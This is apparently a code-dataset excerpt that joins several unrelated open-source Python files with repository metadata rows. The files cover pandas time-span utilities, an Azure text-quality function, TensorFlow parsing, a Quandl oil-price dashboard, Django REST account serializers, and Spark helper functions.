('contiguous transitions', contiguous_transitions),
('not contiguous transitions', len(begs) - contiguous_transitions - 1),
('coverage', coverage),
('end', ends[len(ends) - 1])
)
retval = pd.Series([m[1] for m in metrics], index=[m[0] for m in metrics])
return retval
def clean_overlap_timespan(begs, ends):
return pd.DataFrame({'ts_end': ends, 'ts_end_shifted': begs.shift(-1)}).min(axis=1)
def fill_na_series(series):
if series.dtype.char == 'O':
series.fillna('UNDEFINED', inplace=True)
else:
series.fillna(-1, inplace=True)
def fill_na_dataframe(df):
for column in df.columns:
if column.startswith('beg_') or column.startswith('end_'):
fill_na_series(df[column])
def to_stamps(df, state_columns, value_columns, beg_col='ts_beg', end_col='ts_end'):
'''
Convert an frame representing periods (eg each row has a beg and end) to a frame representing change of periods.
Example:
This dataframe:
dummy ts_beg ts_end value
0 3 2015-01-01 2015-01-02 1
1 4 2015-01-02 2015-01-03 2
is converted to
ts beg_value end_value
0 2015-01-01 1 NaN
1 2015-01-02 2 1
2 2015-01-03 NaN 2
'''
beg_columns = dict(
[(beg_col, 'ts')] +
[(col, 'beg_%s' % col) for col in state_columns] +
[('beg_%s' % col, col) for col in value_columns]
)
end_columns = dict(
[(end_col, 'ts')] +
[(col, 'end_%s' % col) for col in state_columns] +
[('end_%s' % col, col) for col in value_columns]
)
df1 = pd.DataFrame(df, columns=list(beg_columns.keys()))
df1.rename(columns=beg_columns, inplace=True)
df2 = pd.DataFrame(df, columns=list(end_columns.keys()))
df2.rename(columns=end_columns, inplace=True)
# return df1, df2
retval = pd.merge(
df1,
df2,
on=['ts'] + value_columns,
how='outer'
)
retval.sort_values('ts', inplace=True)
if retval['ts'].duplicated().sum():
raise IntegrityError
fill_na_dataframe(retval)
return retval
def to_spans(df, state_columns, value_columns, beg_col='ts_beg', end_col='ts_end'):
'''
Revert method of to_stamps
Example:
This dataframe:
ts beg_value end_value
0 2015-01-01 1 NaN
1 2015-01-02 2 1
2 2015-01-03 NaN 2
is converted to
ts_beg ts_end value
0 2015-01-01 2015-01-02 1
1 2015-01-02 2015-01-03 2
'''
beg_columns = dict(
[('ts', beg_col)] +
[('beg_%s' % col, col) for col in state_columns] +
[(col, 'beg_%s' % col) for col in value_columns]
)
end_columns = dict(
[('ts', end_col)] +
[('end_%s' % col, col) for col in state_columns] +
[(col, 'end_%s' % col) for col in value_columns]
)
df_beg = pd.DataFrame(df.iloc[:-1], columns=beg_columns.keys())
df_beg.rename(columns=beg_columns, inplace=True)
df_beg.reset_index(drop=True, inplace=True)
df_end = pd.DataFrame(df.iloc[1:], columns=end_columns.keys())
df_end.rename(columns=end_columns, inplace=True)
df_end.reset_index(drop=True, inplace=True)
# print(df_beg)
# print(df_end)
return pd.DataFrame(dict(list(df_beg.to_dict('series').items()) + list(df_end.to_dict('series').items())))
# def merge_spans(left, right):
# for key in ('beg', 'end'):
# spans['ts'] = spans['ts_%s' % key]
# spans = pd.merge(stamps, spans, how='outer', on='ts')
# spans.set_index('ts', inplace=True)
# spans.sort_index(inplace=True)
# for column in columns_states:
# spans['%s_%s' % (column, key)] = spans.pop(column).interpolate(method='time')
# spans['%s_%s' % (column, key)].fillna(method='ffill', inplace=True)
# spans['%s_%s' % (column, key)].fillna(method='bfill', inplace=True)
# spans.reset_index(inplace=True)
# spans.pop('ts')
# spans = spans[~pd.isnull(spans['ts_%s' % key])]
# return spans
def compute_segments(df, columns):
'''
'''
mask = pd.Series([False] * len(df))
for column in columns:
mask = mask | (df[column] != df[column].shift(1))
return mask.astype(int).cumsum()
def merge_overlapping_events(df, beg, end, kind=None):
'''
Args:
- df (pandas dataframe): contains events.
- beg (str): name of the column containing beginning timestamps.
- end (str): name of the column containing ending timestamps.
- kind (str): name of the column describing the kind of events (useful if two kind of events coexist and you do not want to merge events
of different kinds).
Output:
- ddf (pandas dataframe). Dataframe df where overlapping events have been merged
'''
if kind is None:
ddf = df.sort_values(by=beg).reset_index(drop=True)
begs = ddf[beg].copy()
ends = ddf[end].copy()
i=0
while i <= len(begs)-2:
j=i+1
while ends[i]>begs[j]: # one enters the loop iff there is an overlap
begs[j]=begs[i] # event j actually starts at begs[i]
ends[i]=max(ends[i],ends[j]) # event i actually ends at least at ends[j]
if j<len(begs)-1:
j+=1
else:
break
i=j
# At this point, event i :
# - starts at the initial begs[i] which was the correct one
# thanks to the initial sort_values
# - ends at ends[j] with j the latest overlapping event after i
#
# We drop all events from i+1 to j
for l in [beg,end]:
ddf.pop(l)
ddf[beg]=begs
ddf[end]=ends
ddf = ddf.drop_duplicates(beg, keep='first').reset_index(drop=True)
else:
raise ValueError('Case kind is not None not coded yet')
return ddf
def merge_overlapping_events_kind(df, beg, end, kind=None):
'''
Args:
- df (pandas dataframe): contains events.
- beg (str): name of the column containing beginning timestamps.
- end (str): name of the column containing ending timestamps.
- kind (list of str): name of the column describing the kind of events (useful if two kind of events coexist and you do not want to merge events of different kinds).
Output:
- ddf (pandas dataframe). Dataframe df where overlapping events have been merged
'''
new_df = pd.DataFrame({beg:[],end:[]})
for kind, ddf in df.groupby(kind):
dddf = merge_overlapping_events(ddf, beg, end)
new_df = new_df.append(dddf, verify_integrity=True, ignore_index=True)
new_df = new_df.reset_index(drop=True)
return new_df
def add_time_between_events(df, beg, end, kind=None):
'''
Args:
- df (pandas dataframe): contains events.
- beg (str) : name of the column containing beginning timestamps.
- end (str) : name of the column containing ending timestamps.
- kind (list of str): list of the columns defining a kind of event (if you want to study separately
different kinds of events)
'''
new_df = pd.DataFrame({beg:[],end:[]})
for kind, ddf in df.groupby(kind):
dddf=ddf.sort_values(by=beg).reset_index(drop=True).copy()
begs = dddf[beg].values
ends = dddf[end].values
if (len(begs)>1):
time_since_previous = [None]
for i in range(1,len(begs)):
time_since_previous.append(begs[i]-ends[i-1])
time_to_next = []
for i in range(0,len(begs)-1):
time_to_next.append(begs[i+1]-ends[i])
time_to_next.append(None)
dddf['time_since_previous']=pd.Series(time_since_previous)
dddf['time_to_next']=pd.Series(time_to_next)
else:
dddf['time_since_previous']=pd.Series([None])
dddf['time_to_next']=pd.Series([None])
new_df = new_df.append(dddf, verify_integrity=True, ignore_index=True)
dddf=None
return new_df
| 34.716783 | 169 | 0.58727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,791 | 0.381811 |
2bcc86f67e357c8f3e80e523d649bd5073ea89d6 | 2,594 | py | Python | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 128 | 2019-06-12T19:24:34.000Z | 2022-03-08T18:39:40.000Z | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 47 | 2019-07-15T22:04:23.000Z | 2022-03-04T18:35:57.000Z | Text/TextQualityWatchdog/Watchdog/__init__.py | iii-PaulCridland/azure-search-power-skills | bbc5848c32b3bd6f2c8942693d854563e0cee708 | [
"MIT"
] | 99 | 2019-06-28T20:56:21.000Z | 2022-03-30T17:17:24.000Z | # Standard libraries
import os
import json
import logging
from typing import Text
# Azure functions
import azure.functions as func
# Inference runtime
import onnxruntime as ort
from tokenizers import BertWordPieceTokenizer
# Helper scripts
from .PreprocessData import normalize_text, truncate_text
from .Predict import get_ids_and_masks, predict
# Initialize ONNX runtime and language model tokenizer
vocab_file_path = os.path.join(os.path.dirname(__file__), "Model/bert-base-uncased-vocab.txt")
onnx_file_path = os.path.join(os.path.dirname(__file__), "Model/watchdog_model.onnx")
tokenizer = BertWordPieceTokenizer(vocab_file_path)
tokenizer.enable_padding(pad_id=0, pad_token="[PAD]", length=128)
tokenizer.enable_truncation(max_length=128)
ort_session = ort.InferenceSession(onnx_file_path)
def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Invoked TextQualityWatchdog Skill.')
try:
body = json.dumps(req.get_json())
if body:
logging.info(body)
values = json.loads(body)['values']
results = {}
results["values"] = []
for value in values:
text = value['data']['text']
# Apply puntuation and whitespace normalization, and convert to lowercase
text = normalize_text(text)
# Truncate the text to a maximum of 128 (default) whitespace separated tokens
text = truncate_text(text)
# Compute the input tokens and attention masks for the text sequence
input_ids, attention_masks = get_ids_and_masks(tokenizer, text)
# Call the ONNX model to perform inference on the input
flat_prediction = predict(ort_session, input_ids, attention_masks)
payload = (
{
"recordId": value['recordId'],
"data": {
"text_quality_warning": int(flat_prediction[0])
}
}
)
results["values"].append(payload)
result = json.dumps(results, ensure_ascii=False)
return func.HttpResponse(result, mimetype="application/json")
else:
return func.HttpResponse(
"Invalid body",
status_code=400
)
except ValueError:
return func.HttpResponse(
"Invalid body",
status_code=400
)
| 32.024691 | 94 | 0.597147 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 634 | 0.24441 |
2bcf3f2068544439d767a23babe47f9de75492b6 | 286 | py | Python | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | 1 | 2020-01-21T11:10:51.000Z | 2020-01-21T11:10:51.000Z | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null | pypy/jit/backend/x86/test/test_quasiimmut.py | benoitc/pypy | a3e1b12d1d01dc29056b7badc051ffc034297658 | [
"MIT"
] | null | null | null |
import py
from pypy.jit.backend.x86.test.test_basic import Jit386Mixin
from pypy.jit.metainterp.test import test_quasiimmut
class TestLoopSpec(Jit386Mixin, test_quasiimmut.QuasiImmutTests):
# for the individual tests see
# ====> ../../../metainterp/test/test_loop.py
pass
| 28.6 | 65 | 0.758741 | 159 | 0.555944 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.262238 |
2bcff61c9348a9aaa8c0c129bc93fe66d8eb6d8c | 1,130 | py | Python | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 95 | 2019-08-30T21:30:38.000Z | 2021-12-30T13:35:39.000Z | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 15 | 2019-11-02T11:48:35.000Z | 2020-11-13T17:37:07.000Z | QPC/ELMo_QPC/utils.py | tifoit/QGforQA | 892d3194d2b78385d5fe0e349facfcfe273daadc | [
"MIT"
] | 19 | 2019-11-07T05:24:36.000Z | 2021-10-13T13:13:04.000Z | import tensorflow as tf
def get_record_parser_qqp(config, is_test=False):
def parse(example):
ques_limit = config.test_ques_limit if is_test else config.ques_limit
features = tf.parse_single_example(example,
features={
"ques1_idxs": tf.FixedLenFeature([], tf.string),
"ques2_idxs": tf.FixedLenFeature([], tf.string),
"label": tf.FixedLenFeature([], tf.string),
"id": tf.FixedLenFeature([], tf.int64)
})
ques1_idxs = tf.reshape(tf.decode_raw(
features["ques1_idxs"], tf.int32), [ques_limit + 2])
ques2_idxs = tf.reshape(tf.decode_raw(
features["ques2_idxs"], tf.int32), [ques_limit + 2])
label = tf.reshape(tf.decode_raw(
features["label"], tf.float32), [2])
qa_id = features["id"]
return ques1_idxs, ques2_idxs, label, qa_id
return parse
| 41.851852 | 95 | 0.489381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.061947 |
2bd0edbc04e1e7d77d7b3ed8a265bcd081096652 | 5,019 | py | Python | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | 1 | 2016-05-15T22:16:36.000Z | 2016-05-15T22:16:36.000Z | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | 1 | 2021-04-30T20:36:55.000Z | 2021-04-30T20:36:55.000Z | oil.py | briwilcox/rnkr-oil | 48dbbf52c24e93dba6e6b563cc30aba1d35b5b22 | [
"MIT"
] | null | null | null | import numpy
import requests
import Quandl
import datetime
from pyrnkr.application import App
from pyrnkr.widgets import Line
from pyrnkr.formula import Trace
def extract_date_index(ts, format='%Y-%m-%d'):
return [x.strftime(format) for x in ts.index.tolist()]
class oil(App):
# This must be consistent with config.json
required_parameters = []
title = 'Overview of Oil' # Appears on top of your application page
subtitle = 'Supply, Consumption, and Prices of Oil Products' # Subtitle to the above
# Production Chart Primary
MultiLineMultiTypeRigCount = "BKRHUGHES/RIGS_BY_BASIN_TOTAL_US_RIG_COUNT" # Example data
SingleLineRigTotal = "BKRHUGHES/RIGS_BY_STATE_TOTALUS_TOTAL"
# Price Charts
BRENT = "EIA/PET_RBRTE_D"
WTI = "EIA/PET_RWTC_D"
# Oil Secondary
MiningUSOilProduction = "FRED/IPG211111CN"
ImportsEndUseCrude = "FRED/IR10000"
OilAndGasWells = "FRED/IPN213111N"
PrivateFixedInvestmentWellsExploration = "FRED/E318RC1Q027SBEA"
# Quandl Token
TOKEN = '' # YOUR TOKEN HERE
def __init__(self, *args, **kwargs):
super(oil, self).__init__(*args, **kwargs)
def get_trace(self, symbol):
"""Get trace for a symbol"""
data = Quandl.get(symbol, authtoken=self.TOKEN)
if data.empty:
raise Exception('could not load series from data source') # If you'd like to handle network
# errors or retry do it here
datay = data[data.columns[0]].tolist() # Data can be manipulated in node.js / python (pandas or numpy)
x = extract_date_index(data)
if len(datay) != len(x):
raise Exception('x and y length do not match') # Sanity Check, trust but verify data feeds
tr = Trace(
x = x,
y = datay,
extra = {
'name': symbol
}
)
return tr # This returns the data to be plotted
def execute(self, parameters):
# Create object to plot
res = {
self.SingleLineRigTotal: {
'title': 'Total U.S. Rig Counts', # Title of individual plot
'subtitle': 'Total U.S. Rotary Rig Counts', # Subtitle of individual plot
'dimension': 'col-md-12', # Bootstrap column dimensions
},
self.BRENT: {
'title': 'Brent Crude',
'subtitle': 'USD Price of Brent Crude Oil',
'dimension': 'col-md-6',
},
self.WTI: {
'title': 'WTI Crude',
'subtitle': 'USD Price of WTI Crude Oil',
'dimension': 'col-md-6',
},
self.MiningUSOilProduction: {
'title': 'US Oil Production',
'subtitle': 'US Oil Production (Indexed 2012 = 100)',
'dimension': 'col-md-6',
},
self.ImportsEndUseCrude: {
'title': 'US Crude Imports',
'subtitle': 'Crude Oil Imports (Indexed 2000 = 100) (Not Seasonally Adjusted)',
'dimension': 'col-md-6',
},
self.OilAndGasWells: {
'title': 'US Oil and Gas Wells',
'subtitle': 'Drilling oil and gas wells',
'dimension': 'col-md-6',
},
self.PrivateFixedInvestmentWellsExploration: {
'title': 'Fixed Investment Wells and Exploration',
'subtitle': '(In Billions USD) (Quarterly Seasonally Adjusted)',
'dimension': 'col-md-6',
}
}
# Because we are using only RNKR line plots iterate through the above create line widgets of variable size
for k, v in res.iteritems():
ts = self.get_trace(k)
res[k]['widget'] = Line(
title=v['title'],
subtitle=v['subtitle'],
dimension=v['dimension'],
traces=[ts]
)
# Render the layout object, primary array is app page, secondary arrays are each bootstrap column
# Styling is dictated here and in the bootstrap column dimensions above
layout = self.render([
[res[self.SingleLineRigTotal]['widget']],
[
res[self.WTI]['widget'],
res[self.BRENT]['widget']
],
[
res[self.MiningUSOilProduction]['widget'],
res[self.ImportsEndUseCrude]['widget']
],
[
res[self.OilAndGasWells]['widget'],
res[self.PrivateFixedInvestmentWellsExploration]['widget']
],
])
return layout, None
def handler(event, context):
"""
AWS Lambda Handler
Inputs depend on your config.json
"""
res, err = oil().run(event)
if err:
raise Exception(err)
return res
# Left for convenience / example of debugging aws lambdas prior to upload
#import json
#print json.dumps(handler({}, {})) | 34.142857 | 114 | 0.560072 | 4,430 | 0.882646 | 0 | 0 | 0 | 0 | 0 | 0 | 2,128 | 0.423989 |
2bd0eeb3efd70d103d079728734a516aeedb0822 | 462 | py | Python | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | code_doc/migrations/0004_auto_20141110_1508.py | coordt/code_doc | c2fac64ac3ad61952a2d9f036727166741f9aff9 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [("code_doc", "0003_auto_20141107_1708")]
operations = [
migrations.RemoveField(model_name="project", name="description"),
migrations.RemoveField(model_name="projectversion", name="description"),
migrations.RemoveField(model_name="topic", name="description"),
]
| 28.875 | 80 | 0.714286 | 353 | 0.764069 | 0 | 0 | 0 | 0 | 0 | 0 | 129 | 0.279221 |
2bd1d28b58763f72536e86090757cedb32c8e0f0 | 193 | py | Python | source/piclient/camerapi/camerahandler_faker.py | rveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | 1 | 2017-07-05T06:47:57.000Z | 2017-07-05T06:47:57.000Z | source/piclient/camerapi/camerahandler_faker.py | royveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | null | null | null | source/piclient/camerapi/camerahandler_faker.py | royveshovda/pifog | 127c2de6ff2666ebc9987d8c2cfd5431ce5ff888 | [
"Apache-2.0"
] | null | null | null | def capture_high_res(filename):
return "./camerapi/tmp_large.jpg"
def capture_low_res(filename):
return "./camerapi/tmp_small.jpg"
def init():
return
def deinit():
return
| 12.866667 | 37 | 0.689119 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 52 | 0.26943 |
2bd347c1734d1e220233fe8467a010ceab1c41ab | 120 | py | Python | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | 15 | 2021-06-09T00:50:53.000Z | 2022-03-15T07:01:43.000Z | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | null | null | null | parallel/__init__.py | MSU-MLSys-Lab/CATE | 654c393d7df888d2c3f3b90f9e6752faa061157e | [
"Apache-2.0"
] | 4 | 2021-06-09T01:01:43.000Z | 2021-11-03T06:16:50.000Z | from .parallel import DataParallelModel, DataParallelCriterion
__all__ = ["DataParallelModel", "DataParallelCriterion"] | 40 | 62 | 0.841667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.35 |
2bd58136299dfe9fb78fc5afd520e4be379aa582 | 10,136 | py | Python | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | null | null | null | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | null | null | null | accounts/serializers.py | aniruddha2000/foodfeeda | 4dffbbe0310a1809c9743b3525e63bac8a8a0768 | [
"Apache-2.0"
] | 1 | 2022-03-17T12:47:40.000Z | 2022-03-17T12:47:40.000Z | from django.contrib.auth.password_validation import validate_password
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils.encoding import force_str
from django.utils.http import urlsafe_base64_decode
from rest_framework.exceptions import AuthenticationFailed
from rest_framework.serializers import (
CharField, EmailField, ModelSerializer, Serializer, ValidationError)
from rest_framework.validators import UniqueValidator
from rest_framework_simplejwt.serializers import TokenObtainPairSerializer
from accounts.models import NGO, CustomUser, Donner
class MyTokenObtainPairSerializer(TokenObtainPairSerializer):
@classmethod
def get_token(cls, user):
token = super(MyTokenObtainPairSerializer, cls).get_token(user)
# Add custom claims
token["email"] = user.email
token["type"] = user.type
return token
class DonnerDetailSerializer(ModelSerializer):
class Meta:
model = Donner
exclude = (
"is_superuser",
"is_staff",
"last_login",
"password",
"country",
"user_permissions",
"groups",
)
class NGODetailSerializer(ModelSerializer):
class Meta:
model = NGO
exclude = (
"is_superuser",
"is_staff",
"last_login",
"password",
"country",
"user_permissions",
)
class DonnerRegisterSerializer(ModelSerializer):
email = EmailField(
required=True, validators=[UniqueValidator(queryset=Donner.objects.all())]
)
password = CharField(write_only=True, required=True,
validators=[validate_password])
password2 = CharField(write_only=True, required=True)
class Meta:
model = Donner
fields = (
"id",
"type",
"email",
"password",
"password2",
"first_name",
"last_name",
"phone_number",
"country",
"state",
"city",
"pin",
"DOB",
"profile_photo",
)
extra_kwargs = {
"first_name": {"required": True},
"last_name": {"required": True},
"password": {"write_only": True},
"password2": {"write_only": True},
}
def validate(self, attrs):
if attrs["password"] != attrs["password2"]:
raise ValidationError(
{"password": "Password fields didn't match."})
return attrs
def create(self, validated_data):
user = Donner.objects.create(
email=validated_data["email"],
first_name=validated_data["first_name"],
last_name=validated_data["last_name"],
type=validated_data["type"],
country=validated_data["country"],
phone_number=validated_data["phone_number"],
state=validated_data["state"],
city=validated_data["city"],
pin=validated_data["pin"],
DOB=validated_data["DOB"],
profile_photo=validated_data["profile_photo"],
)
user.set_password(validated_data["password"])
user.save()
return user
class NGORegisterSerializer(ModelSerializer):
email = EmailField(
required=True, validators=[UniqueValidator(queryset=Donner.objects.all())]
)
password = CharField(write_only=True, required=True,
validators=[validate_password])
password2 = CharField(write_only=True, required=True)
class Meta:
model = NGO
fields = (
"id",
"email",
"password",
"password2",
"name",
"phone_number",
"type",
"country",
"state",
"city",
"pin",
"ngo_approval_cert",
)
extra_kwargs = {
"name": {"required": True},
"password": {"write_only": True},
"password2": {"write_only": True},
}
def validate(self, attrs):
if attrs["password"] != attrs["password2"]:
raise ValidationError(
{"password": "Password fields didn't match."})
return attrs
def create(self, validated_data):
user = NGO.objects.create(
email=validated_data["email"],
name=validated_data["name"],
type=validated_data["type"],
phone_number=validated_data["phone_number"],
country=validated_data["country"],
state=validated_data["state"],
city=validated_data["city"],
pin=validated_data["pin"],
ngo_approval_cert=validated_data["ngo_approval_cert"],
)
user.set_password(validated_data["password"])
user.save()
return user
class DonnerChangePasswordSerializer(ModelSerializer):
password = CharField(
write_only=True, required=True, validators=[validate_password])
password2 = CharField(write_only=True, required=True)
old_password = CharField(write_only=True, required=True)
class Meta:
model = Donner
fields = ('old_password', 'password', 'password2')
def validate(self, attrs):
if attrs['password'] != attrs['password2']:
raise ValidationError(
{"password": "Password fields didn't match."})
return attrs
def validate_old_password(self, value):
user = self.context['request'].user
if not user.check_password(value):
raise ValidationError(
{"old_password": "Old password is not correct"})
return value
def update(self, instance, validated_data):
instance.set_password(validated_data['password'])
instance.save()
return instance
class NGOChangePasswordSerializer(ModelSerializer):
password = CharField(
write_only=True, required=True, validators=[validate_password])
password2 = CharField(write_only=True, required=True)
old_password = CharField(write_only=True, required=True)
class Meta:
model = NGO
fields = ('old_password', 'password', 'password2')
def validate(self, attrs):
if attrs['password'] != attrs['password2']:
raise ValidationError(
{"password": "Password fields didn't match."})
return attrs
def validate_old_password(self, value):
user = self.context['request'].user
if not user.check_password(value):
raise ValidationError(
{"old_password": "Old password is not correct"})
return value
def update(self, instance, validated_data):
instance.set_password(validated_data['password'])
instance.save()
return instance
class DonnerUpdateUserSerializer(ModelSerializer):
class Meta:
model = Donner
fields = (
"first_name",
"last_name",
"phone_number",
"country",
"state",
"city",
"pin",
"DOB",
"profile_photo",
)
def validate_email(self, value):
user = self.context['request'].user
if Donner.objects.exclude(pk=user.pk).filter(email=value).exists():
raise ValidationError({"email": "This email is already in use."})
return value
def update(self, instance, validated_data):
instance.first_name = validated_data['first_name']
instance.last_name = validated_data['last_name']
instance.phone_number = validated_data['phone_number']
instance.country = validated_data['country']
instance.state = validated_data['state']
instance.city = validated_data['city']
instance.pin = validated_data['pin']
instance.DOB = validated_data['DOB']
instance.profile_photo = validated_data['profile_photo']
instance.save()
return instance
class NGOUpdateUserSerializer(ModelSerializer):
class Meta:
model = NGO
fields = (
"name",
"phone_number",
"country",
"state",
"city",
"pin",
"ngo_approval_cert",
)
def validate_email(self, value):
user = self.context['request'].user
if NGO.objects.exclude(pk=user.pk).filter(email=value).exists():
raise ValidationError({"email": "This email is already in use."})
return value
def update(self, instance, validated_data):
instance.name = validated_data['name']
instance.phone_number = validated_data['phone_number']
instance.country = validated_data['country']
instance.state = validated_data['state']
instance.city = validated_data['city']
instance.pin = validated_data['pin']
instance.ngo_approval_cert = validated_data['ngo_approval_cert']
instance.save()
return instance
class EmailResetPasswordSerializer(Serializer):
email = EmailField(min_length=5)
class Meta:
fields = ['email']
class SetNewPasswordSerializer(Serializer):
password = CharField(min_length=6, max_length=100, write_only=True)
uidb64 = CharField(min_length=1, write_only=True)
token = CharField(min_length=1, write_only=True)
class Meta:
fields = ["password", "uidb64", "token"]
def validate(self, attrs):
try:
password = attrs.get("password")
uidb64 = attrs.get("uidb64")
token = attrs.get("token")
id = force_str(urlsafe_base64_decode(uidb64))
user = CustomUser.objects.get(id=id)
if not PasswordResetTokenGenerator().check_token(user, token):
raise AuthenticationFailed("The reset link is invalid", 401)
user.set_password(password)
user.save()
return (user)
except Exception:
raise AuthenticationFailed("The reset link is invalid", 401)
| 29.811765 | 82 | 0.594909 | 9,515 | 0.938733 | 0 | 0 | 235 | 0.023185 | 0 | 0 | 1,704 | 0.168114 |
2bd5ae744552e1cc86f7a6d91ead98d30783f188 | 453 | py | Python | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | 6 | 2015-01-19T11:14:03.000Z | 2016-02-22T06:16:51.000Z | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | null | null | null | examples/2-tulip-download.py | feihong/tulip-talk | 1c99db11797bf7209eddfff1767a7e6b948c1ebb | [
"CC-BY-4.0"
] | null | null | null | import tulip
from tulip import http
@tulip.coroutine
def download(url):
response = yield from http.request('GET', url)
for k, v in response.items():
print('{}: {}'.format(k, v[:80]))
data = yield from response.read()
print('\nReceived {} bytes.\n'.format(len(data)))
if __name__ == '__main__':
loop = tulip.get_event_loop()
coroutine = download('http://omegafeihong.tumblr.com')
loop.run_until_complete(coroutine)
| 26.647059 | 58 | 0.660044 | 0 | 0 | 238 | 0.525386 | 255 | 0.562914 | 0 | 0 | 79 | 0.174393 |
2bd67d5e723b9c06ff50baa0fbd6ffdaf7fb05cb | 3,752 | py | Python | python/ts/flint/utils.py | mattomatic/flint | ee1dc08b5a7f2c84e41bfbc7a02e069d23d02c72 | [
"Apache-2.0"
] | 972 | 2016-10-25T20:56:50.000Z | 2022-03-23T06:05:59.000Z | python/ts/flint/utils.py | mattomatic/flint | ee1dc08b5a7f2c84e41bfbc7a02e069d23d02c72 | [
"Apache-2.0"
] | 66 | 2016-11-02T15:27:35.000Z | 2022-02-15T16:48:48.000Z | python/ts/flint/utils.py | jaewanbahk/flint | eda21faace03ed90258d1008071e9ac7033f5f48 | [
"Apache-2.0"
] | 218 | 2016-11-04T11:03:24.000Z | 2022-01-21T21:31:59.000Z | #
# Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_UNIT_TO_JUNIT = {
"s": "SECONDS",
"ms": "MILLISECONDS",
"us": "MICROSECONDS",
"ns": "NANOSECONDS"
}
def jsc(sc):
"""Returns the underlying Scala SparkContext
:param sc: SparkContext
:return: :class:`py4j.java_gateway.JavaObject` (org.apache.spark.SparkContext)
"""
return sc._jsc.sc()
def jvm(sc):
"""Returns the Pyspark JVM handle
:param sc: SparkContext
:return: :class:`py4j.java_gateway.JavaView
` """
return sc._jvm
def scala_object(jpkg, obj):
return jpkg.__getattr__(obj + "$").__getattr__("MODULE$")
def scala_package_object(jpkg):
return scala_object(jpkg, "package")
def pyutils(sc):
"""Returns a handle to ``com.twosigma.flint.rdd.PythonUtils``
:param sc: SparkContext
:return: :class:`py4j.java_gateway.JavaPackage` (com.twosigma.flint.rdd.PythonUtils)
"""
return jvm(sc).com.twosigma.flint.rdd.PythonUtils
def copy_jobj(sc, obj):
"""Returns a Java object ``obj`` with an additional reference count
:param sc: Spark Context
:param obj: :class:`py4j.java_gateway.JavaObject`
:return: ``obj`` (:class:`py4j.java_gateway.JavaObject`) with an additional reference count
"""
return pyutils(sc).makeCopy(obj)
def to_list(lst):
"""Make sure the object is wrapped in a list
:return: a ``list`` object, either lst or lst in a list
"""
if isinstance(lst, str):
lst = [lst]
elif not isinstance(lst, list):
try:
lst = list(lst)
except TypeError:
lst = [lst]
return lst
def list_to_seq(sc, lst, preserve_none=False):
"""Shorthand for accessing PythonUtils Java Package
If lst is a Python None, returns a None or empty Scala Seq (depending on preserve_none)
If lst is a Python object, such as str, returns a Scala Seq containing the object
If lst is a Python tuple/list, returns a Scala Seq containing the objects in the tuple/list
:return: A copy of ``lst`` as a ``scala.collection.Seq``
"""
if lst is None:
if preserve_none:
return None
else:
lst = []
return jvm(sc).org.apache.spark.api.python.PythonUtils.toSeq(to_list(lst))
def py_col_to_scala_col(sc, py_col):
converters = {
list: list_to_seq,
tuple: list_to_seq
}
convert = converters.get(type(py_col))
if convert:
return convert(sc, py_col)
else:
return py_col
def junit(sc, unit):
"""Converts a Pandas unit to scala.concurrent.duration object
:return: Scala equivalent of ``unit`` as ``scala.concurrent.duration object``
"""
